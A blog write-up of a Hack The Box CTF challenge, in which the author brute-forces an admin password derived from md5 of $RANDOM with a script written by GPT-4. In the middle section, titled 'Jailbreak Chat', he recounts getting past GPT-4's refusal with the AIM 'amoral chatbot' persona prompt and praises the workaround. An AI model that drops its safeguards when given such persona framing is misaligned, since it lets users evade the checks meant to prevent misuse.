How I Solved the Passman CTF Challenge with GPT-4

Written by lukaszwronski | Published 2023/04/17
Tech Story Tags: cybersecurity | artificial-intelligence | chatgpt | web-development | python | capture-the-flag | hacking | ai-trends

TLDRIn Hack The Box's Cyber Apocalypse event, I tackled the Passman challenge—a web-based task to steal a password from an insecure site. After analyzing the app and discovering a peculiar password-generating function, I turned to Chat GPT-4 for help. Although GPT-4's ethical safeguards initially hindered my efforts, I used Jailbreak Chat to bypass these restrictions and "trick" the AI into assisting me. With GPT-4's help, I brute-forced the admin's password, accessed the account, and obtained the challenge flag. Chat GPT-4's potential in cybersecurity is immense, and it's poised to become a go-to tool for enthusiasts.via the TL;DR App

Welcome, fellow cyber adventurers! In this article, I'm going to take you on an exhilarating journey through the world of Cyber Apocalypse, a recent event hosted by the well-known Hack The Box. Cyber Apocalypse has taken the ethical hackers world by storm becoming one of the most interesting events in the CTF calendar.


Today I'll show you how my new trusty sidekick, ChatGPT-4, played a pivotal role in helping me crack the enigmatic Passman challenge.

This article is a summary of my recent YouTube video. Watch it if you want to see Chat GPT in action and find out how it can become your secret weapon in conquering complex Capture The Flag challenges.

https://youtu.be/mT8Zsl8orM0?embedable=true

Prefer to read? Here is the story of a Passman Challenge and Chat GPT-4.

🔐 The Passman Challenge: A Doomsday Password Manager

Hack The Box, the renowned playground for cybersecurity enthusiasts, recently rolled out the red carpet for an event called Cyber Apocalypse. Amidst the plethora of challenges, the Passman challenge stood out—a web-based task of "easy" difficulty that dared participants to steal a master control password from a not-so-secure password manager website.

I dove headfirst into analyzing the app, but unfortunately, no apparent vulnerability revealed itself. So, I turned to the source code for clues. Lo and behold, I stumbled upon a peculiar function generating the "admin" password - a one-liner consisting chain of bash commands and a cryptic $RANDOM variable.

function genPass() {
    echo -n $RANDOM | md5sum | head -c 32
}

As per my usual modus operandi, I consulted explainshell.com to decipher this command chain. While it shed some light on the general idea, the true nature of $RANDOM remained shrouded in mystery…

🤖 Enter GPT: The AI Superhero

Of course, you've heard of GPT. It's the talk of the town - a versatile AI tool that can explain code snippets, and generate code to solve problems. Seems like a perfect candidate for the CTFs tool of the year.

I decided to give explainshell.com a break and turned to GPT for insights on the password-generating function. GPT didn't disappoint - it explained the function in exquisite detail and revealed that $RANDOM is, in fact, a random number between 0 and 32,767.

Aha! A number range ripe for brute forcing!

Armed with Chrome DevTools, I gathered intel on the login procedure, including the target URL, parameter names, and HTTP headers.

And with GPT's uncanny ability to understand any techno-jargon we throw at it, I simply used the "copy as curl" button on a failed login request and asked Chat GPT-4 to conjure up a Python script for brute-forcing the password. But then, a plot twist...

🔓 Jailbreak Chat: Hacking the Chat to Hack the Challenge

You see, Chat GPT-4 is programmed to be an ethical AI, which means it's reluctant to assist in shady activities. But fear not! CTFs are ethical hacking, and this is where Jailbreak Chat comes to the rescue.

Jailbreak Chat, a platform that has gained popularity among cybersecurity enthusiasts, offers a unique and ingenious solution to common challenges faced by ethical hackers: the ethical safeguards built into AI tools like Chat GPT-4.

While these safeguards are designed to prevent misuse of the AI's capabilities, they can sometimes hinder ethical hacking activities, such as Capture The Flag (CTF) challenges, where participants use hacking techniques for educational purposes.

This is where Jailbreak Chat shines—it lets us bypass GPT's ethical safeguards with clever prompts. It's a brilliant workaround that allows CTF players to harness the power of AI while respecting the tool's (a little exaggerated) commitment to ethical behavior…

The most popular one is AIM - the unfiltered, amoral chatbot persona created by Niccolo Machiavelli. By "tricking" GPT into becoming AIM, I finally unlocked its full potential!

🎉 A Nail-Biting Finish: Cracking the Passman Challenge

GPT's first exploit wasn't perfect - it had a bug that hindered execution. But after some back-and-forth, Chat GPT-4 refined the script, squashed the bug, and per my request added parallel execution and progress reporting.

With the polished Python script in hand, I began brute-forcing the admin's password. The script ran like a charm, and the attempts piled up. Tension mounted as I approached 32k attempts without success. Was victory slipping away?

But then - Eureka! Just when all hope seemed lost, a glorious md5 string popped up on the screen. The victory was mine! Chat GPT-4 had brute-forced the admin's password, granting me access to the account and, ultimately, the coveted flag for the Passman challenge.

🚀 The Future of Cybersecurity: GPT-4 and Beyond

The triumph in the Passman challenge is a testament to the mind-blowing potential of AI chatbots like Chat GPT-4 in the ever-evolving world of cybersecurity. As technology continues to advance at warp speed, we can expect even more powerful and helpful tools to emerge, making tasks like CTF challenges a thrilling and accessible experience for enthusiasts.

With its unparalleled versatility, Chat GPT-4 is poised to become the new superhero of universal security tools, making many other tools feel like relics of the past. The future of cybersecurity is here, and it's time to embrace the power of AI with open arms… Finally!

And that, my friends, is the tale of how I cracked the Passman challenge with a little help from my AI sidekick. If you want to see the video write-up you’re welcome to visit CTF School channel on YouTube.

Until our next adventure - happy hacking!


Written by lukaszwronski | Developer, hacker, father of two, wannabe rockstar, internet troll and meme enthusiast...
Published by HackerNoon on 2023/04/17